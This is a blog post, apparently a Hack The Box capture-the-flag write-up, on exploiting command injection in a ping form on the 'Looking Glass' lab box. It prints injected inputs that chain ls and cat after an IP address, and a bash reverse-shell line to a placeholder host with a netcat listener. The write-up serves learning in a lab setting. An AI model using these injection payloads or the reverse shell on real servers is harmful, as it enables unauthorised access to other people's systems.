Open in app

Sign in

Write

Sign in

Looking Glass

Aneesh Verma
3 min readAug 31, 2022
OWASP Top 10

Getting back into pwning boxes. Starting with an easy track of OWASP Top 10.

The first box is Looking Glass which is listed easy.

The ips might be different in different pics as I got lazy solving it in one go.

I open the IP and see the source code but nothing interesting.

As routine, I use masscan to find ports and then use nmap to find details on them in the background.

Vulnerability

However, when I saw what the webpage was doing, I asked myself, can it be that easy?
The vulnerability seemed to be Command Injection since a command was being executed on the server and we could input IP.
I opened Burp and intercepted the Ping request and Traceroute request.
In Ping request, I quickly tested for Command Injection:

And I got the result:

Vulnerability confirmed. It is Command Injection.

Exploitation

Exploitation was a little annoying.

Ping

First, I tried pinging from the server to our machine just by:
ping x.x.x.x (my IP).

I would monitor that using tcpdump:
sudo tcpdump icmp -i wlan0

However, I got no data on tcpdump and there was 100% packet loss in response.

Then, I tried chaining another ping but that didn’t work too:
206.189.125.80&ping x.x.x.x
I got a Gateway Timeout Error.

Reverse Shell

I was like, I will try reverse shell anyhow even if, the chances were low since ping didn’t work.

I set my netcat:
nc -lvnp 4004

Then passed the following input to the request:

206.189.125.80&bash -i >& /dev/tcp/x.x.x.x/4004 0>&1

However, I got nothing in response.

List (ls)

I was getting irritated, so I thought, I will just brute force this. I gave “ls” in the input:
206.189.125.80&ls

And I got index.php in response. I knew it it’s a wrap now.

Flag is usually in root dir, therefore the input now looked like:
206.189.125.80&ls ../

In response, I saw “flag_gHuE1” file. Naturally, I opened the file using “cat”:
206.189.125.80&cat flag_gHuE1

And congratulations the flag is here.

Overall, an easy box but I had fun :)

Looking forward to pwning more easy boxes, getting some good foundation again, and then going for medium boxes again.

Hack The Box Writeup
Owasp Top 10
Looking Glass
Command Injection
Hackthebox

--

--

Aneesh Verma

Written by Aneesh Verma

4 Followers

Grad student, Cybersec and Fitness enthusiast.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams